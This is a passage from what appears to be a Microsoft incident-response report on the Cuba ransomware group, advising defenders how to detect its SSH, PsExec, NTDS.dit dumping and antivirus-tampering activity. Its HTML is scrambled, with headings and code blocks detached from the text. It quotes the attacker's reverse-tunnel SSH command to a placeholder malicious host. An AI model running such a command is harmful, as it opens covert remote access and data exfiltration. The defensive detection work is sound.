malicious use. Examples of anomalous paths include but are not limited to:<\/p>\n\n\n\n Microsoft recommends monitoring for unauthorized installations and usage of SSH in your network. SSH should not run as \u201cNT AUTHORITY\\System\u201d<\/em>.<\/p>\n\n\n\n In this incident, the actor used the following SSH command lines. Similar activity should be monitored within your environment:<\/p>\n\n\n\n The actor attempted to masquerade the SSH process as \u201c<\/em>svchost.exe\u201d<\/em><\/em>, so monitoring for the command on other process names may indicate process masquerading.<\/p>\n\n\n\n Microsoft recommends monitoring for the command prompt accessing remote shares. This was a common technique used by the actor for transferring files throughout the network.<\/p>\n\n\n\n Microsoft Defender for Endpoint will create an alert when the command prompt accesses remote shares. This includes the Impacket usage where the command targets the localhost ADMIN$ share. Monitoring these alerts within your network can help detect unauthorized access.<\/p>\n\n\n\n Networks should monitor for unauthorized usage of PsExec. Suggested detection techniques include:<\/p>\n\n\n\n The techniques that PsExec uses can easily be replicated, either through living-off-the-land tools or through a custom toolset using the Windows API. Monitoring for each stage of PsExec can help detect unauthorized variants within your network. PsExec works in three stages:<\/p>\n\n\n\n Monitoring executable files being written to administrative shares may help detect attempts of lateral movement. This can include monitoring for native command lines, such as copy, targeting remote shares like what we mentioned above. Defender for Endpoint can be used to monitor file creation events via Server Message Block (SMB) through DeviceFileEvents. The executable file will be created by the ntoskrnl.exe process, which is the kernel process that manages SMB, and the ShareName column will be ADMIN$.<\/p>\n\n\n\n Anomalous remote connections to RPC (Port 135) should be monitored within the network, as this can be used by a process to remotely create and start a service. The summarize and sort operators within Defender for Endpoint\u2019s Advanced Hunting can help detect uncommon connections on Port 135. The following KQL can help build a basis for identifying anomalous connections:<\/p>\n\n\n\n This technique can also be replicated through remote service creation using named pipes. An actor can remotely connect to the IPC$ share and open the named pipe svcctl to remotely create a service. This would contain similar detections, except the traffic will be over port 445 to the IPC$ share.<\/p>\n\n\n\n On the destination end, the RPC connection will result in the creation of a service. Monitoring for unauthorized service creation can be done through capturing the 4679 event in the System event log.<\/p>\n\n\n\n Remote named pipe communication can be monitored through the creation of the named pipe on the destination server. PsExeSvc.exe<\/em> will create a named pipe called PSEXESVC, which the host device can connect to through the IPC$ share. As the host device connection is through SMB, the ntoskrnl.exe<\/em> process will connect to the named pipe as a client.<\/p>\n\n\n\n Monitor the usage of ntdsutil for malicious instances, where actors may attempt to obtain the NTDS.dit<\/em>. The command in the NTDS.dit<\/em> dumping section shows how the actor used this tool to create a copy of the NTDS.dit<\/em>. This command can be monitored, with the path being the only variable that will change. There are limited legitimate reasons to create a full NTDS.dit<\/em> copy.<\/p>\n\n\n\n Defender for Endpoint alerts on the dumping of the NTDS.dit<\/em>, and these alerts should be responded to with high priority. Monitoring for the unauthorized usage of the \u201cntdsutil\u201d<\/em> tool is strongly encouraged as well.<\/p>\n\n\n\n If your network has file monitoring enabled, alerting on the creation of new .dit files can also help detect potential NTDS.dit<\/em> dumping. The actor was observed copying the NTDS.dit<\/em> out of a volume shadow copy.<\/p>\n\n\n\n Organizations should monitor and respond to antivirus and endpoint detection and response (EDR) alerts where antivirus has been disabled or tampered with. Wherever possible, anti-tampering settings should be enabled to prevent actors from being able to interact with and disable antivirus software. For more information about Defender for Endpoint tamper protection, visit our docs page: Protect security settings with tamper protection<\/a>.<\/p>\n\n\n\n Microsoft Defender Antivirus provides event logging<\/a> on attempted tampering of the product. This can include the disabling of services, such as Real Time Protection (Event ID: 5001). An alert will also be created within the Defender for Endpoint portal where customers have the ability to further triage the alert through the advanced hunting interface<\/a>. Monitoring for the usage of the Windows PowerShell cmdlet can also help discover instances of anti-virus tampering.<\/p>\n\n\n\n DART was able to detect actor RDP connections through anomalous connections. These anomalous connections include:<\/p>\n\n\n\n Domain and enterprise administrator logons should be audited for anomalous connections, including connections originating from edge servers or onto servers that they do not usually administrate. Multifactor authentication (MFA) should be enforced for administrator accounts.<\/p>\n\n\n\n Ransomware groups continue to grow in sophistication through the increasing hibernation times before encryption, large varieties of persistent access and the use of legitimate signed binaries. These groups continue to target sensitive data for exfiltration, with some groups returning to the network post-encryption to ensure they maintain a foothold on the network.<\/p>\n\n\n\n Networks must remain vigilant hunting for these TTPs and anomalous behaviors. The Cuba ransomware group used a large variety of living of the land techniques to help evade detection by antivirus products. This requires a stronger focus on anomaly and behavioral detections for hunting on a network, rather than standard malicious file detection. Software auditing of remote access tools and remote execution tools, such as PsExec and SSH, should be regularly evaluated.<\/p>\n\n\n\n Microsoft strongly recommends focusing on the following actions to help improve your network\u2019s security posture:<\/p>\n\n\n\nLateral movement<\/h3>\n\n\n\n
Credential access<\/h3>\n\n\n\n
Exfiltration<\/h3>\n\n\n\n
Defense evasion<\/h3>\n\n\n\n
Discovery<\/h3>\n\n\n\n
\n
Recommended detection and defense strategies<\/h2>\n\n\n\n
Service creation<\/h3>\n\n\n\n
\n
\n
Use of SSH<\/h3>\n\n\n\n
ssh <organization>@<malicious IP address> -p 443 -i C:\\ProgramData\\ssh\\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no<\/pre>\n\n\n\n
Copying to remote share<\/h3>\n\n\n\n
PsExec<\/h3>\n\n\n\n
\n
\n
DeviceNetworkEvents\n| where RemotePort == 135\n| summarize count() by InitiatingProcessFileName\n| sort by count_ asc<\/pre>\n\n\n\n
NTDS.dit<\/em> dumping<\/h3>\n\n\n\n
Antivirus tampering<\/h3>\n\n\n\n
Remote desktop protocol<\/h3>\n\n\n\n
\n
Conclusion<\/h2>\n\n\n\n